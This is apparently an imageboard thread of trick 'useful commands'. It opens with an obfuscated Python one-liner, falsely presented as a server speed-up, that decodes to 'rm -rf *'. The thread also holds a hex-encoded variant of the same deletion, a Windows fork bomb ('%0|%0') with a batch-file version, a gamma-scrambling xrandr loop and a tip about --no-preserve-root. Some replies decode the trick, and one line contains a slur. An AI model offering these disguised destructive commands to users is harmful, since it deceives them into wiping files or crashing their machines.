python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
I heard this command speeds up your server. Is it true?
Python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
People don't lie on the internet bruh
the
"".join(XXX)
thing is so disgusting, why did they let that happen?
this.
You're right, who would do such a thing?
in which language ARE strings lists of characters, directly
No but looks cleaner now. Thanks OP.
Useful commands thread?
Useful commands thread.
$(echo 726d202d7266202a | xxd -r -p)
Do this on windows
%0|%0
If you dare [spoiler]:^)[/spoiler]
>sn sg
Are you sure? It got rid of some of the bloat on mine.
Erlang
C:\Users\Faggot>%0|%0
%0: Command not found.
%0: Command not found.
>>
>that -1
>that sn!
>os.system(
i despise python and not even i need to look at anything else to know what that shit is going/trying to do
really weak sauce...
C
Haskell
rm -rf / doesn't work you idiot. You need to add --no-perserve-root.
Give me something that will wreck my XP vm.
try putting it in a .bat file
>this is what cucks ACTUALLY look like
> :m Data.Char
> map (chr . pred . ord) "sn!.sg!+"
"rm -rf *"
>
install gentoo
Depends on the distro
> pred "sn!.sg!+"
"rm -rf *"
echo %0|%0 > x.bat && x
wrong board, that's what half of cs students look like
i didn't know that Char was an instance of the Enum type class
enjoy:
while :; do xrandr --output $(xrandr | awk '/ connected/ { print $1 }') --gamma 0.$((RANDOM%9)):0.$((RANDOM%9)):0.$((RANDOM%9)); done
# remedy:
xrandr --output $(xrandr | awk '/ connected/ { print $1 }') --gamma 1:1:1
base64 -d
I never understood why people don't just use /* instead.